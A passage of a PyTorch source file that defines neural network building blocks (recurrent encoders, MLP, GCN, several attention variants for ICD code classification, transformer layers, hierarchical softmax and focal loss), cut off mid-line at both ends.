descending=False)\n\n x = nn.utils.rnn.pack_padded_sequence(x[indices], xlen, batch_first=True)\n output, hn = self.biLSTM(x) # output: batchSize × seqLen × hiddenSize*2; hn: numLayers*2 × batchSize × hiddenSize\n if xlen is not None:\n output, _ = nn.utils.rnn.pad_packed_sequence(output, batch_first=True)\n return output[desortedIndices]\n return output # output: batchSize × seqLen × hiddenSize*2\n def orthogonalize_gate(self):\n nn.init.orthogonal_(self.biLSTM.weight_ih_l0)\n nn.init.orthogonal_(self.biLSTM.weight_hh_l0)\n nn.init.ones_(self.biLSTM.bias_ih_l0)\n nn.init.ones_(self.biLSTM.bias_hh_l0)\n\nclass TextGRU(nn.Module):\n def __init__(self, feaSize, hiddenSize, num_layers=1, dropout=0.0, bidirectional=True, name='textBiGRU'):\n super(TextGRU, self).__init__()\n self.name = name\n self.biGRU = nn.GRU(feaSize, hiddenSize, bidirectional=bidirectional, batch_first=True, num_layers=num_layers, dropout=dropout)\n\n def forward(self, x, xlen=None):\n # x: batchSizeh × seqLen × feaSize\n if xlen is not None:\n xlen, indices = torch.sort(xlen, descending=True)\n _, desortedIndices = torch.sort(indices, descending=False)\n\n x = nn.utils.rnn.pack_padded_sequence(x[indices], xlen, batch_first=True)\n output, hn = self.biGRU(x) # output: batchSize × seqLen × hiddenSize*2; hn: numLayers*2 × batchSize × hiddenSize\n if xlen is not None:\n output, _ = nn.utils.rnn.pad_packed_sequence(output, batch_first=True)\n return output[desortedIndices]\n\n return output # output: batchSize × seqLen × hiddenSize*2\n\nclass FastText(nn.Module):\n def __init__(self, feaSize, name='fastText'):\n super(FastText, self).__init__()\n self.name = name\n def forward(self, x, xLen):\n # x: batchSize × seqLen × feaSize; xLen: batchSize\n x = torch.sum(x, dim=1) / xLen.float().view(-1,1)\n return x\n\nclass MLP(nn.Module):\n def __init__(self, inSize, outSize, hiddenList=[], dropout=0.0, bnEveryLayer=False, dpEveryLayer=False, outBn=False, outAct=False, outDp=False, name='MLP', actFunc=nn.ReLU):\n super(MLP, self).__init__()\n self.name = name\n hiddens,bns = [],[]\n for i,os in enumerate(hiddenList):\n hiddens.append( nn.Sequential(\n nn.Linear(inSize, os),\n ) )\n bns.append(nn.BatchNorm1d(os))\n inSize = os\n bns.append(nn.BatchNorm1d(outSize))\n self.actFunc = actFunc()\n self.dropout = nn.Dropout(p=dropout)\n self.hiddens = nn.ModuleList(hiddens)\n self.bns = nn.ModuleList(bns)\n self.out = nn.Linear(inSize, outSize)\n self.bnEveryLayer = bnEveryLayer\n self.dpEveryLayer = dpEveryLayer\n self.outBn = outBn\n self.outAct = outAct\n self.outDp = outDp\n def forward(self, x):\n for h,bn in zip(self.hiddens,self.bns):\n x = h(x)\n if self.bnEveryLayer:\n if len(x.shape)==3:\n x = bn(x.transpose(1,2)).transpose(1,2)\n else:\n x = bn(x)\n x = self.actFunc(x)\n if self.dpEveryLayer:\n x = self.dropout(x)\n x = self.out(x)\n if self.outBn: x = self.bns[-1](x)\n if self.outAct: x = self.actFunc(x)\n if self.outDp: x = self.dropout(x)\n return x\n\nclass GCN(nn.Module):\n def __init__(self, inSize, outSize, hiddenSizeList=[], dropout=0.0, bnEveryLayer=False, dpEveryLayer=False, outBn=False, outAct=False, outDp=False, resnet=False, name='GCN', actFunc=nn.ReLU):\n super(GCN, self).__init__()\n self.name = name\n hiddens,bns = [],[]\n for i,os in enumerate(hiddenSizeList):\n hiddens.append(nn.Sequential(\n nn.Linear(inSize, os),\n ) )\n bns.append(nn.BatchNorm1d(os))\n inSize = os\n bns.append(nn.BatchNorm1d(outSize))\n self.actFunc = actFunc()\n self.dropout = nn.Dropout(p=dropout)\n self.hiddens = nn.ModuleList(hiddens)\n self.bns = nn.ModuleList(bns)\n self.out = nn.Linear(inSize, outSize)\n self.bnEveryLayer = bnEveryLayer\n self.dpEveryLayer = dpEveryLayer\n self.outBn = outBn\n self.outAct = outAct\n self.outDp = outDp\n self.resnet = resnet\n def forward(self, x, L):\n # x: nodeNum × feaSize; L: batchSize × nodeNum × nodeNum\n for h,bn in zip(self.hiddens,self.bns):\n a = h(torch.matmul(L,x)) # => batchSize × nodeNum × os\n if self.bnEveryLayer:\n if len(L.shape)==3:\n a = bn(a.transpose(1,2)).transpose(1,2)\n else:\n a = bn(a)\n a = self.actFunc(a)\n if self.dpEveryLayer:\n a = self.dropout(a)\n if self.resnet and a.shape==x.shape:\n a += x\n x = a\n a = self.out(torch.matmul(L, x)) # => batchSize × nodeNum × outSize\n if self.outBn:\n if len(L.shape)==3:\n a = self.bns[-1](a.transpose(1,2)).transpose(1,2)\n else:\n a = self.bns[-1](a)\n if self.outAct: a = self.actFunc(a)\n if self.outDp: a = self.dropout(a)\n if self.resnet and a.shape==x.shape:\n a += x\n x = a\n return x\n\nclass TextAttention(nn.Module):\n def __init__(self, method, name='textAttention'):\n super(TextAttention, self).__init__()\n self.attn = LuongAttention(method)\n self.name = name\n def forward(self, sequence, reference):\n # sequence: batchSize × seqLen × feaSize; reference: batchSize × classNum × feaSize\n alpha = self.attn(reference, sequence) # => batchSize × classNum × seqLen\n return torch.matmul(alpha, sequence) # => batchSize × classNum × feaSize\n\nclass ICDAttention(nn.Module):\n def __init__(self, inSize, classNum, transpose=False, name='ICDAttention'):\n super(ICDAttention, self).__init__()\n self.transpose = transpose\n self.U = nn.Linear(inSize, classNum)\n self.name = name\n def forward(self, X):\n # X: batchSize × seqLen × inSize\n alpha = F.softmax(self.U(X), dim=1) # => batchSize × seqLen × classNum\n X = torch.matmul(X.transpose(1,2), alpha) # => batchSize × inSize × classNum\n return X.transpose(1,2)\n\nclass LAATAttention(nn.Module):\n def __init__(self, inSize, classNum,d_a, transpose=False, name='LAATAttention'):\n super(LAATAttention, self).__init__()\n self.transpose = transpose\n self.first_linears = nn.Linear(inSize, d_a)\n self.U = nn.Linear(d_a, classNum)\n self.name = name\n def forward(self, X):\n # X: batchSize × seqLen × inSize\n Z = F.tanh(self.first_linears(X))\n alpha = F.softmax(self.U(Z), dim=1) # => batchSize × seqLen × classNum\n X = torch.matmul(X.transpose(1,2), alpha) # => batchSize × inSize × classNum\n return X.transpose(1,2)\n\n# 从Linear的weight里面取 1000个位置的weight\nclass ICDCandiAttention(nn.Module):\n def __init__(self, inSize, classNum, transpose=False, name='ICDCandiAttention'):\n super(ICDCandiAttention, self).__init__()\n self.transpose = transpose\n self.U = nn.Linear(inSize, classNum)\n self.name = name\n def forward(self, X, candidate):\n # X: batchSize × seqLen × inSize\n batchLabelVec =torch.stack([self.U.weight[candidate[i]] for i in range(len(candidate))], dim=0) # => batchSize × Candidates num(1000) × inSize \n alpha = F.softmax(torch.matmul(X, batchLabelVec.transpose(1,2)), dim=1) # => batchSize × seqLen × Candidates num(1000)\n X = torch.matmul(alpha.transpose(1,2),X) # => batchSize x candidateNum x inSize\n return X\n\nclass DeepICDAttention(nn.Module):\n def __init__(self, inSize, classNum, hdnDropout=0.1, attnList=[], compress=False, name='DeepICDAttn'):\n super(DeepICDAttention, self).__init__()\n hdns,attns,bns = [],[],[]\n if not compress:\n attnList = attnList + [classNum]\n else:\n self.decode = nn.Sequential(\n nn.Linear(attnList[-1], classNum),\n nn.BatchNorm1d(inSize),\n nn.ReLU()\n )\n for os in attnList:\n hdns.append(nn.Linear(inSize,inSize))\n attns.append(nn.Linear(inSize,os))\n bns.append(nn.BatchNorm1d(inSize))\n self.hdns = nn.ModuleList(hdns)\n self.attns = nn.ModuleList(attns)\n self.bns = nn.ModuleList(bns)\n self.dropout = nn.Dropout(p=hdnDropout)\n self.compress = compress\n self.name = name\n def forward(self, X):\n # X: batchSize × seqLen × inSize\n for h,a,b in zip(self.hdns,self.attns,self.bns):\n alpha = F.softmax(a(X), dim=1) # => batchSize × seqLen × os\n X = torch.matmul(alpha.transpose(1,2), X) # => batchSize × os × inSize\n X = h(X) # => batchSize × os × inSize\n X = b(X.transpose(1,2)).transpose(1,2) # => batchSize × os × inSize\n X = F.relu(X) # => batchSize × os × inSize\n X = self.dropout(X) # => batchSize × os × inSize\n if self.compress:\n X = self.decode(X.transpose(1,2)).transpose(1,2)\n # => batchSize × classNum × inSize\n return X\n\nclass DeepICDDescAttention(nn.Module):\n def __init__(self, inSize, classNum, labSize=1024, hdnDropout=0.1, attnList=[], labDescVec=None, name='DeepICDAttn'):\n super(DeepICDDescAttention, self).__init__()\n hdns,attns,bns = [],[],[]\n for i,os in enumerate(attnList):\n attns.append(nn.Linear(inSize,os))\n if i==len(attnList)-1:\n hdns.append(nn.Linear(inSize, labSize))\n inSize = labSize\n else:\n hdns.append(nn.Linear(inSize,inSize))\n bns.append(nn.BatchNorm1d(inSize))\n self.hdns = nn.ModuleList(hdns)\n self.attns = nn.ModuleList(attns)\n self.bns = nn.ModuleList(bns)\n self.dropout = nn.Dropout(p=hdnDropout)\n self.labDescVec = nn.Parameter(torch.tensor(labDescVec, dtype=torch.float32)) if labDescVec is not None else None\n self.name = name\n def forward(self, X, labDescVec=None):\n if labDescVec is None:\n labDescVec = self.labDescVec\n # X: batchSize × seqLen × inSize\n for h,a,b in zip(self.hdns,self.attns,self.bns):\n alpha = F.softmax(a(X), dim=1) # => batchSize × seqLen × os\n X = torch.matmul(alpha.transpose(1,2), X) # => batchSize × os × inSize\n X = h(X) # => batchSize × os × inSize\n X = b(X.transpose(1,2)).transpose(1,2) # => batchSize × os × inSize\n X = F.relu(X) # => batchSize × os × inSize\n X = self.dropout(X) # => batchSize × os × inSize\n # X => batchSize × os × icdSize labDescVec => icdSize × 1000\n alpha = F.softmax(torch.matmul(X, labDescVec.transpose(0,1)), dim=1) # => batchSize × os × classNum\n X = torch.matmul(alpha.transpose(1,2), X) # => batchSize × classNum × inSize\n return X\n\nclass DeepICDDescCandiAttention(nn.Module):\n def __init__(self, inSize, classNum, labSize=1024, hdnDropout=0.1, attnList=[], labDescVec=None, name='DeepICDDescCandiAttention'):\n super(DeepICDDescCandiAttention, self).__init__()\n hdns,attns,bns = [],[],[]\n for i,os in enumerate(attnList):\n attns.append(nn.Linear(inSize,os))\n if i==len(attnList)-1:\n hdns.append(nn.Linear(inSize, labSize))\n inSize = labSize\n else:\n hdns.append(nn.Linear(inSize,inSize))\n bns.append(nn.BatchNorm1d(inSize))\n self.hdns = nn.ModuleList(hdns)\n self.attns = nn.ModuleList(attns)\n self.bns = nn.ModuleList(bns)\n self.dropout = nn.Dropout(p=hdnDropout)\n self.labDescVec = nn.Parameter(torch.tensor(labDescVec, dtype=torch.float32)) if labDescVec is not None else None\n self.name = name\n def forward(self, X, candidate, labDescVec=None):\n if labDescVec is None: \n labDescVec = self.labDescVec\n # X: batchSize × seqLen × inSize\n # labDescVec: Class num × 1024 tensor\n # 拿到当前batch 对应的candidates np.array 索引\n for h,a,b in zip(self.hdns,self.attns,self.bns):\n alpha = F.softmax(a(X), dim=1) # => batchSize × seqLen × os\n X = torch.matmul(alpha.transpose(1,2), X) # => batchSize × os × inSize\n X = h(X) # => batchSize × os × inSize\n X = b(X.transpose(1,2)).transpose(1,2) # => batchSize × os × inSize\n X = F.relu(X) # => batchSize × os × inSize\n X = self.dropout(X) # => batchSize × os × inSize\n # => batchSize × os × icdSize\n # 根据Candidates 取出 每个batch对应的标签矩阵 batchSize × 1000 × 1024\n # 源: labDescVec: Class num × 1024 np.array 二维\n # 目标: batchSize x 1000 x1024 三维(二维concat)\n batchLabelVec =torch.stack([labDescVec[candidate[i]] for i in range(len(candidate))], dim=0) # => batchSize × Candidates num(1000) × 1024\n alpha = F.softmax(torch.matmul(X, batchLabelVec.transpose(1,2)), dim=1) # => batchSize × os × Candidates num(1000)\n X = torch.matmul(alpha.transpose(1,2), X) # => batchSize × Candidates num(1000) × inSize\n return X\n \nclass LuongAttention(nn.Module):\n def __init__(self, method):\n super(LuongAttention, self).__init__()\n self.method = method\n def dot_score(self, hidden, encoderOutput):\n # hidden: batchSize × classNum × hiddenSize; encoderOutput: batchSize × seq_len × hiddenSize\n return torch.matmul(encoderOutput, hidden.transpose(-1,-2)) # => batchSize × seq_len × classNum\n def forward(self, hidden, encoderOutput):\n attentionScore = self.dot_score(hidden, encoderOutput).transpose(-1,-2)\n # attentionScore: batchSize × classNum × seq_len\n return F.softmax(attentionScore, dim=-1) # => batchSize × classNum × seq_len\n\nclass SimpleAttention(nn.Module):\n def __init__(self, inSize, actFunc=nn.Tanh(), name='SimpleAttention'):\n super(SimpleAttention, self).__init__()\n self.name = name\n self.W = nn.Linear(inSize, int(inSize//2))\n self.U = nn.Linear(int(inSize//2), 1)\n self.actFunc = actFunc\n def forward(self, input):\n # input: batchSize × seqLen × inSize\n x = self.W(input) # => batchSize × seqLen × inSize//2\n H = self.actFunc(x) # => batchSize × seqLen × inSize//2\n alpha = F.softmax(self.U(H), dim=1) # => batchSize × seqLen × 1\n return self.actFunc( torch.matmul(input.transpose(1,2), alpha).squeeze(2) ) # => batchSize × inSize\n\nclass KnowledgeAttention(nn.Module):\n def __init__(self, noteFeaSize, titleFeaSize, name='knowledgeAttention'):\n super(KnowledgeAttention, self).__init__()\n self.linear = nn.Sequential(\n nn.Linear(noteFeaSize, titleFeaSize),\n nn.Tanh()\n )\n self.labWeight = None\n self.name = name\n def forward(self, noteConved, titleEncoded):\n # noteConved: batchSize × noteFeaSize; titleEncoded: titleNum × titleFeaSize\n x = self.linear(noteConved) # => batchSize × titleFeaSize\n attnWeight = F.softmax(torch.matmul(x, titleEncoded.transpose(0,1)), dim=1) # => batchSize × titleNum\n self.labWeight = attnWeight.detach().cpu().numpy()\n return torch.matmul(attnWeight, titleEncoded) # => batchSize × titleFeaSize\n\nclass InterationAttention(nn.Module):\n def __init__(self, feaSize1, feaSize2, dropout=0.0, attnType='poolAttn', name='interAttn'):\n super(InterationAttention, self).__init__()\n self.attnFunc = {'poolAttn':self.pooling_attention,\n 'poolAttn_s':self.pooling_attention_s,\n 'catSimAttn':self.concat_simple_attention,\n 'plaAttn':self.plane_attention,\n 'plaAttn_s':self.plane_attention_s}\n assert attnType in self.attnFunc.keys()\n self.name = name\n self.U = nn.Linear(feaSize1, feaSize2)\n self.W = nn.Linear(feaSize2, 1)\n self.simpleAttn1 = SimpleAttention(feaSize1+feaSize2)\n self.simpleAttn2 = SimpleAttention(feaSize1+feaSize2)\n self.feaSize1,self.feaSize2 = feaSize1,feaSize2\n self.attnType = attnType\n self.dropout = nn.Dropout(dropout)\n\n def pooling_attention_s(self, x, y):\n u = self.U(x).unsqueeze(dim=2) # => batchSize × seqLen1 × 1 × feaSize2\n v = y.unsqueeze(dim=1) # => batchSize × 1 × seqLen2 × feaSize2\n alpha = torch.sum(u*v,dim=3) # => batchSize × seqLen1 × seqLen2\n xAlpha,_ = torch.max(alpha, dim=2, keepdim=True) # => batchSize × seqLen1 × 1\n x = torch.matmul(x.transpose(1,2), F.softmax(xAlpha,dim=1)).squeeze(dim=2) # => batchSize × feaSize1\n yAlpha,_ = torch.max(alpha, dim=1, keepdim=True) # => batchSize × 1 × seqLen2\n y = torch.matmul(F.softmax(yAlpha,dim=2), y).squeeze(dim=1) # => batchSize × feaSize2\n return torch.cat([x,y], dim=1) # => batchSize × (feaSize1+feaSize2)\n\n def pooling_attention(self, x, y):\n u = self.U(x).unsqueeze(dim=2) # => batchSize × seqLen1 × 1 × feaSize2\n v = y.unsqueeze(dim=1) # => batchSize × 1 × seqLen2 × feaSize2\n alpha = F.tanh(u*v) # => batchSize × seqLen1 × seqLen2 × feaSize2\n alpha = self.W(alpha).squeeze(dim=3) # => batchSize × seqLen1 × seqLen2\n xAlpha,_ = torch.max(alpha, dim=2, keepdim=True) # => batchSize × seqLen1 × 1\n x = torch.matmul(x.transpose(1,2), F.softmax(xAlpha,dim=1)).squeeze(dim=2) # => batchSize × feaSize1\n yAlpha,_ = torch.max(alpha, dim=1, keepdim=True) # => batchSize × 1 × seqLen2\n y = torch.matmul(F.softmax(yAlpha,dim=2), y).squeeze(dim=1) # => batchSize × feaSize2\n return torch.cat([x,y], dim=1) # => batchSize × (feaSize1+feaSize2)\n\n def concat_simple_attention(self, x, y):\n x_pooled,_ = torch.max(x, dim=1) # => batchSize × feaSize1\n y_pooled,_ = torch.max(y, dim=1) # => batchSize × feaSize2\n u = torch.cat([x, y_pooled.unsqueeze(dim=1).expand(-1,x.shape[1],-1)], dim=2) # => batchSize × seqLen1 × (feaSize1+feaSize2)\n v = torch.cat([y, x_pooled.unsqueeze(dim=1).expand(-1,y.shape[1],-1)], dim=2) # => batchSize × seqLen2 × (feaSize1+feaSize2)\n x,y = self.simpleAttn1(u)[:,:self.feaSize1],self.simpleAttn2(v)[:,:self.feaSize2]\n return torch.cat([x,y], dim=1) # => batchSize × (feaSize1+feaSize2)\n\n def plane_attention_s(self, x, y):\n u = self.U(x).unsqueeze(dim=2) # => batchSize × seqLen1 × 1 × feaSize2\n v = y.unsqueeze(dim=1) # => batchSize × 1 × seqLen2 × feaSize2\n alpha = torch.sum(u*v,dim=3) # => batchSize × seqLen1 × seqLen2\n alpha = F.softmax(alpha.flatten(1,2),dim=1).unsqueeze(dim=1) # => batchSize × 1 × seqLen1*seqLen2\n\n x,y = x.unsqueeze(dim=2).expand(-1,-1,y.shape[1],-1),y.unsqueeze(dim=1).expand(-1,x.shape[1],-1,-1) # => batchSize × seqLen1 × seqLen2 × feaSize\n xy = torch.cat([x,y], dim=3).flatten(1,2) # => batchSize × seqLen1*seqLen2 × (feaSize1+feaSize2)\n return torch.matmul(alpha, xy).squeeze(dim=1) # => batchSize × (feaSize1+feaSize2)\n\n def plane_attention(self, x, y):\n u = self.U(x).unsqueeze(dim=2) # => batchSize × seqLen1 × 1 × feaSize2\n v = y.unsqueeze(dim=1) # => batchSize × 1 × seqLen2 × feaSize2\n alpha = F.tanh(u*v) # => batchSize × seqLen1 × seqLen2 × feaSize2\n alpha = self.W(alpha).squeeze(dim=3) # => batchSize × seqLen1 × seqLen2\n alpha = F.softmax(alpha.flatten(1,2),dim=1).unsqueeze(dim=1) # => batchSize × 1 × seqLen1*seqLen2\n\n x,y = x.unsqueeze(dim=2).expand(-1,-1,y.shape[1],-1),y.unsqueeze(dim=1).expand(-1,x.shape[1],-1,-1) # => batchSize × seqLen1 × seqLen2 × feaSize\n xy = torch.cat([x,y], dim=3).flatten(1,2) # => batchSize × seqLen1*seqLen2 × (feaSize1+feaSize2)\n return torch.matmul(alpha, xy).squeeze(dim=1) # => batchSize × (feaSize1+feaSize2)\n\n def forward(self, x, y):\n # x: batchSize × seqLen1 × feaSize1; y: batchSize × seqLen2 × feaSize2\n return self.dropout(self.attnFunc[self.attnType](x,y)) # => batchSize × (feaSize1+feaSize2)\n\nclass SelfAttention(nn.Module):\n def __init__(self, featureSize, dk, multiNum, name='selfAttn'):\n super(SelfAttention, self).__init__()\n self.dk = dk\n self.multiNum = multiNum\n self.WQ = nn.ModuleList([nn.Linear(featureSize, self.dk) for i in range(multiNum)])\n self.WK = nn.ModuleList([nn.Linear(featureSize, self.dk) for i in range(multiNum)])\n self.WV = nn.ModuleList([nn.Linear(featureSize, self.dk) for i in range(multiNum)])\n self.WO = nn.Linear(self.dk*multiNum, featureSize)\n self.name = name\n def forward(self, x, xlen=None):\n # x: batchSize × seqLen × feaSize; xlen: batchSize\n queries = [self.WQ[i](x) for i in range(self.multiNum)] # => multiNum*(batchSize × seqLen × dk)\n keys = [self.WK[i](x) for i in range(self.multiNum)] # => multiNum*(batchSize × seqLen × dk)\n values = [self.WV[i](x) for i in range(self.multiNum)] # => multiNum*(batchSize × seqLen × dk)\n scores = [torch.bmm(queries[i], keys[i].transpose(1,2))/np.sqrt(self.dk) for i in range(self.multiNum)] # => multiNum*(batchSize × seqLen × seqLen)\n # mask padding\n if xlen is not None:\n for i in range(len(scores)):\n mask = torch.zeros(scores[0].shape, dtype=torch.float32, device=scores[i].device) # => batchSize × seqLen × seqLen\n for j,k in enumerate(xlen):\n mask[j,:,k-1:] -= 999999\n scores[i] = scores[i] + mask\n z = [torch.bmm(F.softmax(scores[i], dim=2), values[i]) for i in range(self.multiNum)] # => multiNum*(batchSize × seqLen × dk)\n z = self.WO(torch.cat(z, dim=2)) # => batchSize × seqLen × feaSize\n return z\n\nclass LayerNormAndDropout(nn.Module):\n def __init__(self, feaSize, dropout=0.1, name='layerNormAndDropout'):\n super(LayerNormAndDropout, self).__init__()\n self.layerNorm = nn.LayerNorm(feaSize)\n self.dropout = nn.Dropout(p=dropout)\n self.name = name\n def forward(self, x):\n return self.dropout(self.layerNorm(x))\n\nclass SimpleSelfAttention(nn.Module):\n def __init__(self, feaSize, name='simpleSelfAttn'):\n super(SimpleSelfAttention, self).__init__()\n self.feaSize = feaSize\n self.WO = nn.Linear(feaSize, feaSize)\n self.name = name\n def forward(self, x, xlen=None):\n # x: batchSize × seqLen × feaSize; xlen: batchSize\n querie = x # => batchSize × seqLen × feaSize\n key = x # => batchSize × seqLen × feaSize\n value = x # => batchSize × seqLen × feaSize\n score = torch.bmm(querie, key.transpose(1,2))/np.sqrt(self.feaSize) # => batchSize × seqLen × seqLen\n # mask padding\n if xlen is not None:\n mask = torch.zeros(score.shape, dtype=torch.float32, device=score.device) # => batchSize × seqLen × seqLen\n for j,k in enumerate(xlen):\n mask[j,:,k-1:] -= 999999\n score = score + mask\n z = torch.bmm(F.softmax(score, dim=2), value) # => batchSize × seqLen × feaSize\n z = self.WO(z) # => batchSize × seqLen × feaSize\n return z\n\nclass ResidualBlock(nn.Module):\n def __init__(self, inchannel, outchannel, kernel_size, stride, use_res, dropout):\n super(ResidualBlock, self).__init__()\n self.left = nn.Sequential(\n nn.Conv1d(inchannel, outchannel, kernel_size=kernel_size, stride=stride, padding=int(floor(kernel_size / 2)), bias=False),\n nn.BatchNorm1d(outchannel),\n nn.Tanh(),\n nn.Conv1d(outchannel, outchannel, kernel_size=kernel_size, stride=1, padding=int(floor(kernel_size / 2)), bias=False),\n nn.BatchNorm1d(outchannel)\n )\n\n self.use_res = use_res\n if self.use_res:\n self.shortcut = nn.Sequential(\n nn.Conv1d(inchannel, outchannel, kernel_size=1, stride=stride, bias=False),\n nn.BatchNorm1d(outchannel)\n )\n\n self.dropout = nn.Dropout(p=dropout)\n\n def forward(self, x):\n out = self.left(x)\n if self.use_res:\n out += self.shortcut(x)\n out = torch.tanh(out)\n out = self.dropout(out)\n return out\n\nclass FFN(nn.Module):\n def __init__(self, featureSize, dropout=0.1, name='FFN'):\n super(FFN, self).__init__()\n self.layerNorm1 = nn.LayerNorm(featureSize)\n self.layerNorm2 = nn.LayerNorm(featureSize)\n self.Wffn = nn.Sequential(\n nn.Linear(featureSize, featureSize*4), \n nn.ReLU(),\n nn.Linear(featureSize*4, featureSize)\n )\n self.dropout = nn.Dropout(p=dropout)\n self.name = name\n def forward(self, x, z):\n z = x + self.dropout(self.layerNorm1(z)) # => batchSize × seqLen × feaSize\n ffnx = self.Wffn(z) # => batchSize × seqLen × feaSize\n return z+self.dropout(self.layerNorm2(ffnx)) # => batchSize × seqLen × feaSize\n\nclass Transformer(nn.Module):\n def __init__(self, featureSize, dk, multiNum, dropout=0.1):\n super(Transformer, self).__init__()\n self.selfAttn = SelfAttention(featureSize, dk, multiNum)\n self.ffn = FFN(featureSize, dropout)\n\n def forward(self, input):\n x, xlen = input\n # x: batchSize × seqLen × feaSize; xlen: batchSize\n z = self.selfAttn(x, xlen) # => batchSize × seqLen × feaSize\n return (self.ffn(x, z),xlen) # => batchSize × seqLen × feaSize\n \nclass TextTransformer(nn.Module):\n def __init__(self, seqMaxLen, layersNum, featureSize, dk, multiNum, dropout=0.1, name='textTransformer'):\n super(TextTransformer, self).__init__()\n posEmb = [[np.sin(pos/10000**(2*i/featureSize)) if i%2==0 else np.cos(pos/10000**(2*i/featureSize)) for i in range(featureSize)] for pos in range(seqMaxLen)]\n self.posEmb = nn.Parameter(torch.tensor(posEmb, dtype=torch.float32), requires_grad=False) # seqLen × feaSize\n self.transformerLayers = nn.Sequential(\n OrderedDict(\n [('transformer%d'%i, Transformer(featureSize, dk, multiNum, dropout)) for i in range(layersNum)]\n )\n )\n self.dropout = nn.Dropout(p=dropout)\n self.name = name\n def forward(self, x, xlen=None):\n # x: batchSize × seqLen × feaSize; xlen: batchSize\n x = self.dropout(x+self.posEmb) # => batchSize × seqLen × feaSize\n return self.transformerLayers((x, xlen)) # => batchSize × seqLen × feaSize\n\nclass Transformer_Wcnn(nn.Module):\n def __init__(self, featureSize, dk, multiNum, seqMaxLen, dropout=0.1):\n super(Transformer_Wcnn, self).__init__()\n self.dk = dk\n self.multiNum = multiNum\n self.WQ = nn.ModuleList([nn.Linear(featureSize, self.dk) for i in range(multiNum)])\n self.WK = nn.ModuleList([nn.Linear(featureSize, self.dk) for i in range(multiNum)])\n self.WV = nn.ModuleList([nn.Linear(featureSize, self.dk) for i in range(multiNum)])\n self.WO = nn.Linear(self.dk*multiNum, featureSize)\n self.layerNorm1 = nn.LayerNorm([seqMaxLen, featureSize])\n self.layerNorm2 = nn.LayerNorm([seqMaxLen, featureSize])\n self.Wcnn = TextCNN(featureSize, featureSize, [1,3,5], reduction='None', actFunc=nn.ReLU(), name='Wffn_CNN')\n self.Wffn = nn.Sequential(\n nn.Linear(featureSize*3, featureSize), \n )\n self.dropout = nn.Dropout(p=dropout)\n\n def forward(self, x):\n # x: batchSize × seqLen × feaSize\n queries = [self.WQ[i](x) for i in range(self.multiNum)] # => multiNum*(batchSize × seqLen × dk)\n keys = [self.WK[i](x) for i in range(self.multiNum)] # => multiNum*(batchSize × seqLen × dk)\n values = [self.WQ[i](x) for i in range(self.multiNum)] # => multiNum*(batchSize × seqLen × dk)\n score = [torch.bmm(queries[i], keys[i].transpose(1,2))/np.sqrt(self.dk) for i in range(self.multiNum)] # => multiNum*(batchSize × seqLen × seqLen)\n z = [torch.bmm(F.softmax(score[i], dim=2), values[i]) for i in range(self.multiNum)] # => multiNum*(batchSize × seqLen × dk)\n z = self.WO(torch.cat(z, dim=2)) # => batchSize × seqLen × feaSize\n z = x + self.dropout(self.layerNorm1(z)) # => batchSize × seqLen × feaSize\n ffnx = torch.cat(self.Wcnn(z), dim=2) # => batchSize × seqLen × feaSize*3\n ffnx = self.Wffn(ffnx) # => batchSize × seqLen × feaSize\n return z+self.dropout(self.layerNorm2(ffnx)) # => batchSize × seqLen × feaSize\n\nclass TextTransformer_Wcnn(nn.Module):\n def __init__(self, layersNum, featureSize, dk, multiNum, seqMaxLen, dropout=0.1, name='textTransformer'):\n super(TextTransformer_Wcnn, self).__init__()\n #posEmb = [[np.sin(pos/10000**(2*i/featureSize)) if i%2==0 else np.cos(pos/10000**(2*i/featureSize)) for i in range(featureSize)] for pos in range(seqMaxLen)]\n #self.posEmb = nn.Parameter(torch.tensor(posEmb, dtype=torch.float32), requires_grad=False) # seqLen × feaSize\n self.transformerLayers = nn.Sequential(\n OrderedDict(\n [('transformer%d'%i, Transformer_Wcnn(featureSize, dk, multiNum, seqMaxLen, dropout)) for i in range(layersNum)]\n )\n )\n self.dropout = nn.Dropout(p=dropout)\n self.name = name\n def forward(self, x):\n # x: batchSize × seqLen × feaSize\n x = self.dropout(x) # => batchSize × seqLen × feaSize\n return self.transformerLayers(x) # => batchSize × seqLen × feaSize\n\nclass HierarchicalSoftmax(nn.Module):\n def __init__(self, inSize, hierarchicalStructure, lab2id, hiddenList1=[], hiddenList2=[], dropout=0.1, name='HierarchicalSoftmax'):\n super(HierarchicalSoftmax, self).__init__()\n self.name = name\n self.dropout = nn.Dropout(p=dropout)\n layers = nn.Sequential()\n for i,os in enumerate(hiddenList1):\n layers.add_module(str(i*2), nn.Linear(inSize, os))\n layers.add_module(str(i*2+1), nn.ReLU())\n inSize = os\n self.hiddenLayers1 = layers\n moduleList = [nn.Linear(inSize, len(hierarchicalStructure))]\n\n layers = nn.Sequential()\n for i,os in enumerate(hiddenList2):\n layers.add_module(str(i*2), nn.Linear(inSize, os))\n layers.add_module(str(i*2+1), nn.ReLU())\n inSize = os\n self.hiddenLayers2 = layers\n\n for i in hierarchicalStructure:\n moduleList.append( nn.Linear(inSize, len(i)) )\n for j in range(len(i)):\n i[j] = lab2id[i[j]]\n self.hierarchicalNum = [len(i) for i in hierarchicalStructure]\n self.restoreIndex = np.argsort(sum(hierarchicalStructure,[]))\n self.linearList = nn.ModuleList(moduleList)\n def forward(self, x):\n # x: batchSize × feaSize\n x = self.hiddenLayers1(x)\n x = self.dropout(x)\n y = [F.softmax(linear(x), dim=1) for linear in self.linearList[:1]]\n x = self.hiddenLayers2(x)\n y += [F.softmax(linear(x), dim=1) for linear in self.linearList[1:]]\n y = torch.cat([y[0][:,i-1].unsqueeze(1)*y[i] for i in range(1,len(y))], dim=1) # => batchSize × classNum\n return y[:,self.restoreIndex]\n\nclass FocalCrossEntropyLoss(nn.Module):\n def __init__(self, gama=2, weight=-1, logit=True):\n super(FocalCrossEntropyLoss, self).__init__()\n self.weight = torch.nn.Parameter(torch.tensor(weight, dtype=torch.float32), requires_grad=False)\n self.gama = gama\n self.logit = logit\n def forward(self, Y_pre, Y):\n if self.logit:\n Y_pre = F.softmax(Y_pre, dim=1)\n P = Y_pre[list(range(len(Y))), Y]\n if self.weight.shape!=torch.Size([]):\n w = self.weight[Y]\n else:\n w = torch.tensor([1.0 for i in range(len(Y))], device=self.weight.device)\n w = (w/w.sum()).reshape(-1)\n return (-w*((1-P)**self.gama * torch.log(P))).sum()\n\nclass ContinusCrossEntropyLoss(nn.Module):\n def __init__(self, gama=2):\n super(ContinusCrossEntropyLoss, self).__init__()\n self.gama = gama\n def forward(self, Y_logit, Y):\n Y_pre = F.softmax(Y_logit, dim=1)\n lab_pre = Y_pre.argmax(dim=1)\n P = Y_pre[list(range(len(Y))), 